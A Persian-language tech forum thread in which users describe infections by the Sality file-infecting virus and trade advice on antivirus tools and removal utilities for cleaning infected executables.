-k – the utility will scan all disks, detect files autorun.inf created by the virus Virus.Win32.Sality and eliminate them. It will also delete the executable file linked by autorun.inf, even if such file has been already disinfected.

6- انتي ويروس نورتون رو اپديت كرده و كل سيستم رو اسكن ميكنم و هرجا كه چيزي شناسايي كرد ريپير رو ميزنم.
تمام
ايا روشهاي بالا كه از سايت كاسپرسكاي برداشته شده بود رو انجام بدم مشكل حل هست؟

درود

خوب شما تازه زیادی هم انجام دادید!

حل دیگه!!

پیروز باشید.

دوستان عزیز
من تعمیرکار کامپیوترم و تا حلا پشت هر سیستمی که رفتم بلا استثنا سالیتی داشته
من چند تا راه حل داشتم

اول از همه نود نصب میکردم فایلارو بدون اجازه پاک می کرد نمی تونه disinfect کنه و اگه مثلا 1000 تا فایل پیدا کنه برای تک تکشون ارور میده که دیلیت کنه قرنطینه یا کلین(که نمی تونه)
بعدش از خود سایت کسپرسکای فایل sality off.exeرو بدست آوردم
خیلی بدرد می خوره ولی دقت داشته باشین این فایل ویروس سالیتی رو در درایو c غیر فعال می کنهو تغییرات رجیستری و پروسس هاشو میبنده و فایل های آلوده رو disinfect می کنه تو شما بتونید آنتی ویروس نصب کنید
و یا از سیف مود استفاده کنید.
بهترین راه حل اول از همه اجرای همین فایل sality off و بعد از اون نصب کسپرسکای هستش
چرا کسپرسکای ؟؟؟؟چون هیچ آنتی ویروسی مثل کسپر فایل های شما رو از ویروس جدا نمیکنه که بعدش دوباره اجرا بشن
اگه نمی تونید kaspersky virus removal tool که خیلی بدرد بخوره و از خود سایت هم فایل دانلود هست

ولی اگه دیسک بوت(نجات) کسپر دارید که دیگه چه بهتر هیچی به این نمیرسه.سریع و مطمئن.

به عنوان مثال من سیستم های یه کارخونه رو اسکی کردم با کسپر با فایل های پوشه ی
system volume information سیستم سر جمع 27500 تا سالیتی داشت.اونم سرور که نرم افزار حسابداری پیوست هم روش نصب بود که دو دفعه ی قبلی نود 32 بخاطر سالیتی پاکش کرده بود
من با بوت کسپر تمام سیستمو پاکسازی کردم

اینم تجربه ی من
موفق باشید:40::40::40:

دوستان عزیز
من تعمیرکار کامپیوترم و تا حلا پشت هر سیستمی که رفتم بلا استثنا سالیتی داشته
من چند تا راه حل داشتم

اول از همه نود نصب میکردم فایلارو بدون اجازه پاک می کرد نمی تونه disinfect کنه و اگه مثلا 1000 تا فایل پیدا کنه برای تک تکشون ارور میده که دیلیت کنه قرنطینه یا کلین(که نمی تونه)
بعدش از خود سایت کسپرسکای فایل sality off.exeرو بدست آوردم
خیلی بدرد می خوره ولی دقت داشته باشین این فایل ویروس سالیتی رو در درایو c غیر فعال می کنهو تغییرات رجیستری و پروسس هاشو میبنده و فایل های آلوده رو disinfect می کنه تو شما بتونید آنتی ویروس نصب کنید
و یا از سیف مود استفاده کنید.
بهترین راه حل اول از همه اجرای همین فایل sality off و بعد از اون نصب کسپرسکای هستش
چرا کسپرسکای ؟؟؟؟چون هیچ آنتی ویروسی مثل کسپر فایل های شما رو از ویروس جدا نمیکنه که بعدش دوباره اجرا بشن
اگه نمی تونید kaspersky virus removal tool که خیلی بدرد بخوره و از خود سایت هم فایل دانلود هست

ولی اگه دیسک بوت(نجات) کسپر دارید که دیگه چه بهتر هیچی به این نمیرسه.سریع و مطمئن.

به عنوان مثال من سیستم های یه کارخونه رو اسکی کردم با کسپر با فایل های پوشه ی
system volume information سیستم سر جمع 27500 تا سالیتی داشت.اونم سرور که نرم افزار حسابداری پیوست هم روش نصب بود که دو دفعه ی قبلی نود 32 بخاطر سالیتی پاکش کرده بود
من با بوت کسپر تمام سیستمو پاکسازی کردم

اینم تجربه ی من
موفق باشید:40::40::40:


سلام خوبی؟
اقا تو وبلاگت نوشتی 16 سالته
حالا تعمیر کار شدی؟:31:

سلام خوبی؟
اقا تو وبلاگت نوشتی 16 سالته
حالا تعمیر کار شدی؟:31:

حالا مگه چشه.
بعدشم تو وبلاگ یادم رفته تغییر بدم 17 سالمه
الانم پشتیبانی چند شرکتو دارم.مگه جرمه؟؟؟؟؟:31::31::31::31::31::15::15:

سلام
امروز nod نصب کردم رو سیستمم.بعد نصب گذاشتم چک کنه.
یه ویروس تو کل هاردم بود که اسمش win32/sality.nac بود
نمیدونستم چیکار میکنه.زدم del بکنتش که بعدش دیدم تمام فلدر هام hide شده.هیچ جوری هم در نمیان.ویروس هم رو hard هست هنوز.
البته من قبل اینکه چک کنم ویندوز و عوض کرده بودم.یعنی درایو C ویروس نداره.
کسی میتونه راهنمایی کنه؟

حالا کسی میدونه چه جوری فایلهای exe ای رو که این ویروس داخلشون کد تزریق کرده رو تشخیص داد و پاک کرد ؟
چون بعد از پتک کردن ویروس اگه بخای رو یکی از این فایل exe ها کلیک کنی ، ویروسه باز فعال میشه و باز روز از نو و روزی از نو ....


دوستان فقط می خواستم بدونم ورژن جدیدی از برنامه های پست اول نیومده؟؟؟

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

دوستان با این روش هام فایلام درست نمیشه با کسپراسکای سرچ کردم ولی فایلای exe سیستممو یا پاک کرد یا غیر قابل مصرف

سلام دوستان
سیستم من هم آلوده به این ویروس شده 2500 تا برنامه های مهمم ویروسی شده چطور می تونم کلین کنم !!!!
البته با avast شناسایی شد اما repair نشد!!

اینم عکس از نوع سالیتی !!


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

HELP HELP!!!! F1-F1

سلام دوستان
سیستم من هم آلوده به این ویروس شده 2500 تا برنامه های مهمم ویروسی شده چطور می تونم کلین کنم !!!!
البته با avast شناسایی شد اما repair نشد!!

اینم عکس از نوع سالیتی !!


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدHELP HELP!!!! F1-F1

سلام

شما راه کارهای پست شماره 1 را انجام دادید؟
#1 ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

من انجام دادم ولی کلین نمیکنه پاک میکنه فایلا میشه 45 کیلوبایت!!

سلام
انجام دادم ولی فایل های من هم 45 کیلو بایتی شد!!!

هیچ راهی نداره؟؟؟؟ تمام آنتی ویروس ها را چک کردم!!

بازم میگم شما باید از کسپرسکای استفاده کنید
تجربه ی شخصی:

اول اجرای این:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

بعد این:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سلام به همه دوستان

چند وقتی هست وقتی وقتی با برنامه Internet Download Manager از سایت YouTube.com (کلا سایتهایی که ویدیو آنلاین دارن) هر فایل تصویری که دانلود میکنم و فقط وقتی وارد پوشه فایل دانلود شده میشم سی پی یو میره رو 100 درصد و تا وقتی explorer.exe را نبندم درست نمیشه
درضمن قبلا این مشکل برام پیش اومده بود ویندوز عوض کردم یکی دو روز درست شد ولی دوباره به همون حالت قبل برگشت
ییشتر هم با سایت You tube و ویدیو های آنلاین این مشکل را دارم
از آنتی ویروس nod 32 ESET_Smart_Security و ویندوز سون استفاده میکنم و همیشه هردو را اپدیت میکنم
لطفا راهنمائی کنید

آقا هیچ انتی ویروسی درست نمیکنه به غیر از avira اخرین ورژن که فایلای exe رو کاملاclean میکنه ازین ویروس

ختما avira استفاده کنین بقیه انتی ویروسا فایلاتونو پاک میکنه

آقا هیچ انتی ویروسی درست نمیکنه به غیر از avira اخرین ورژن که فایلای exe رو کاملاclean میکنه ازین ویروس

ختما avira استفاده کنین بقیه انتی ویروسا فایلاتونو پاک میکنه

با نسخه رايگانشم ميتونه فايلها رو بدون پاك كردن پاكسازي كنه؟اگه ميشه لطفا لينك آخرين ورژن رو بدين

سلام هرچند من آنتی ویروسavira را قبول ندارم.این لینک دانلودش :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

اگر اهل دانلود کردن تو سایت ها هستی . حتما مورد حمله malver هائی که آماده هستند همراه با فایل دانلود شده
بداخل pc میایند قرا گرفتی .و بعضی هاشون به تمام drive های ویندوز حمله می کنند.انگار که با ورود خود صد ها بچه malver با خودشون میارن.من فقط pand internet security 2011 را قبول دارم.اگر مورد حمله قرا بگیری و خودت نفهمی با اسکن و اتصال به اینترنت می تونی همه را پاک کنی.فقط ضعفش تو usb است . به درد کسانی می خوره که از usb کم استفاده میکنند و دائم در حال جستجو و search هستند.

سلام هرچند من آنتی ویروسavira را قبول ندارم.این لینک دانلودش :

چرا قبولش ندارين؟بعد اين لينكي كه دادين نسخه رايگان هست؟

با نسخه رايگانشم ميتونه فايلها رو بدون پاك كردن پاكسازي كنه؟اگه ميشه لطفا لينك آخرين ورژن رو بدين

آره میتونه با نسخه مجانی هم این کار رو کنه! البته فقط سالیتی رو نه ویروت رو!!!

هر کسی عقیده خودش رو داره!

بسته به این داره از آنتی ویروستون چه انتظاری داشته باشید.

که مفصل در انجمن آنتی ویروس ها روش بحث شده.

آره میتونه با نسخه مجانی هم این کار رو کنه!

فرق نسخه مجاني با پوليش چيه؟

سلام بر همه دوستان
بنده صاحب یک گیم نت هستم که از بد روزگار دچار این ویروس شدم :( حالا بماند که چقدر تلاش کردم تا بعد از نصب ویندوز و کلی گیمو بک اپ گیری به این نتیجه برسم . و اما نتیجه :
اول خبر: این ویروس علاوه بر این که خودش رو به فایل های exe می چسبونه قابلیت اینو داره که خودش رو تو پهنای شبکه مخفی کنه .یعنی اینکه برای خودش تو محیط lan (جدای از ویندوز ) حتی اگر تاییدیه های ادمین یک کامپیوتر که در اون شبکه هست بسته باشه ، کپی بشه .
دوم کسانی که مشکل منرو دارن (اونایی که کلی setup یا کرک یا keygen یا هر چی که براشون مهمه دارن و یا با شبکه سررشته دارن) اگر به این ویروس الوده شدن و راه حلی برای پاک کردنش پیدا کردن اینو بدونن که تمام راه حل ها از جمله رجیستری یا انتی ویروس ها بدون استثنا منتهی میشه به کلین یا از کار افتادن کامل فایل هاشون من راه حلم برای پاک سازی نیست راهی که من میگم یک اقدام پیشگیرانه هست و اون اینه که :
اگر هنوز اقدام به نصب انتی ویروس یا هرچی که این و پاک می کنه نکردید و خیلی هم به فایلها ، ستاپها و یا کرک هاتون علاقه دارید بهتره قبل از هرکاری از تمام فایل هاتون بکاپ بگیرین (دقت کنید نه توسط برنامه ی بکاپ گیری خود ویندوز ) چون این ویروس توانایی همراهی با فایل های پچ شده یا همون کد گزاری compress رو نداره و وقتی توسط یک برنامه (نورتون گاست ) که قابلیت کد گزاری رو فایل ها رو داره بکاپ می شه بطور خودکار از کار می افته . حالا شاید سوال این باشه که اقا ما بر فرض backup گرفتیم حالا اخه ادمه حسابی شاید بعد از recovery دوباره روز از نو روزی از نو . جواب اول من گفتم که ویروس از کار می افته . دوم در یک حالت از کار نمی افته که اونم اینه که بایه نرم افزاری جز نورتون گاست بک اپ بگیرید (نورتون رو خودم امتحان کردم) که اون وقت جواب اینه قبل از بکاپ گیری انتی ویروسی که توانایی شناساییشو داشته باشه قبل از ریکاوری نصب و در حالت حداکثر امنیت بزارید سپس اقدام به بکاپ گیری کنید. با تشکر .حامد از گیم نت مدرن تبریز .

من فكر نكنم كه سيستمم در حال حاضر به ويروس سليتي دچار باشه، چون هيچكدوم از مشكلات مربوط به اين ويروس مثل از كار افتادن تسك منجر يا از كار افتادن آنتي ويروس يا خراب شدن فايلهاي exe جديد رو ندارم، ولي نود32 كه دائما در حال اسكن كامپيوتر هست بعضي از فايلهاي exe قديميم رو با اين ويروس شناسايي كرده كه فكر كنم قبلا سيستمم اين ويروس رو گرفته بود و فايلهاي قديميم دچارش شدن، حالا من بدون رفتن به safe mode با Kaspersky Virus Removal Tool 2011 مي تونم كل درايوهام رو اسكن كنم؟ و با اين روش مي تونم فايلهاي exe قديميم رو repair كنم؟
نصب Kaspersky Virus Removal Tool 2011 كنار نود32 اسمارت سكيوريتي مشكلي نداره؟

من فكر نكنم كه سيستمم در حال حاضر به ويروس سليتي دچار باشه، چون هيچكدوم از مشكلات مربوط به اين ويروس مثل از كار افتادن تسك منجر يا از كار افتادن آنتي ويروس يا خراب شدن فايلهاي exe جديد رو ندارم، ولي نود32 كه دائما در حال اسكن كامپيوتر هست بعضي از فايلهاي exe قديميم رو با اين ويروس شناسايي كرده كه فكر كنم قبلا سيستمم اين ويروس رو گرفته بود و فايلهاي قديميم دچارش شدن، حالا من بدون رفتن به safe mode با Kaspersky Virus Removal Tool 2011 مي تونم كل درايوهام رو اسكن كنم؟ و با اين روش مي تونم فايلهاي exe قديميم رو repair كنم؟
نصب Kaspersky Virus Removal Tool 2011 كنار نود32 اسمارت سكيوريتي مشكلي نداره؟
نه مشکلی نیست با همین کامپوننت کاسپر میشه ترتیبشون را داد
در کنار نود هم مشکلی نیست

May you do well:40:

من فكر نكنم كه سيستمم در حال حاضر به ويروس سليتي دچار باشه، چون هيچكدوم از مشكلات مربوط به اين ويروس مثل از كار افتادن تسك منجر يا از كار افتادن آنتي ويروس يا خراب شدن فايلهاي exe جديد رو ندارم، ولي نود32 كه دائما در حال اسكن كامپيوتر هست بعضي از فايلهاي exe قديميم رو با اين ويروس شناسايي كرده كه فكر كنم قبلا سيستمم اين ويروس رو گرفته بود و فايلهاي قديميم دچارش شدن، حالا من بدون رفتن به safe mode با Kaspersky Virus Removal Tool 2011 مي تونم كل درايوهام رو اسكن كنم؟ و با اين روش مي تونم فايلهاي exe قديميم رو repair كنم؟
نصب Kaspersky Virus Removal Tool 2011 كنار نود32 اسمارت سكيوريتي مشكلي نداره؟

مشکلی که به وجود نمیاد پیشنهاد من اینه که ازنسخه پرتابل برنامه فقط استفاده کنید به سیستم شما هم فشار نمیاره :20:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

نصب Windows Defender كنار آنتي ويروس مشكلي ايجاد نمي كنه؟ (من نود32 اسمارت سكيوريتي دارم)
و بهتره كدوم يكي از سه نرم افزار امنيتي مايكروسافت در صفحه زير رو كنار آنتي ويروس خودمون نصب كنيم؟ يا هر سه تاش رو ميشه نصب كرد؟
البته بعلاوه Kaspersky Virus Removal Tool 2011


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

(من نود32 اسمارت سكيوريتي دارم)

نمی دوم ملت کی قراره بفهمن کلیه محصولات ناد 32 فقط برای خنده س نه برای امنیت

نمی دوم ملت کی قراره بفهمن کلیه محصولات ناد 32 فقط برای خنده س نه برای امنیت
نمیدونم ولی میدونم تا وقتی که خود ناد 32 جمع شده باشه خودشم گفته باشه بابا من یک اسکنر بیش نیستم ، حتی اون موقع هم یک سری بیخیالش نمیشن!

دیگه به چه زبونی باید گفت که ورژن های ناد حتی خود برنامش باگ داره خصوصا ورژن 5
هرچی رای هم هست همیشه گیر ناد میاد جالبه!

Take Care:40:

سلام

دوستان سیستممو با avira اسکن میکنم ویر.س Win32.Sality.L گرفته فایلای EXE با چی میتونم ویروسو از فایلام پاک کنم؟؟

سلام

دوستان سیستممو با avira اسکن میکنم ویر.س Win32.Sality.L گرفته فایلای EXE با چی میتونم ویروسو از فایلام پاک کنم؟؟
سلام
ازین برنامه استفاده کنین:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

آویرا ممکنه که فایلهای Exe رو از بین ببره
ولی این برنامه تعمیر میکنه

Take Care:40:

فقط با این پاک کنید

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

---------- Post added at 02:24 PM ---------- Previous post was at 02:23 PM ----------

باهم پست دادیم :31:

فقط با این پاک کنید

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

---------- Post added at 02:24 PM ---------- Previous post was at 02:23 PM ----------

باهم پست دادیم :31:

ممنون ولی اینم نکشت اخه برای من sality.L این برنامه برای ورژنای قبلی این ویروسه AVIRA ام فقط فایلو DELET میکنه نه تمیز!

ممنون ولی اینم نکشت اخه برای من sality.L این برنامه برای ورژنای قبلی این ویروسه AVIRA ام فقط فایلو DELET میکنه نه تمیز!

سلام
با این برنامه امتحان کنین:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
از سمت راست سایت یکی از External mirror ها رو بگیرین.

یه احتمال کوچولو هم بدین که سالیتی به جای اضافه شدن به فایل Exe کل اون فایل رو Overwrite کرده باشه که دیگه امکان نداره درست بشه!

Take Care:40: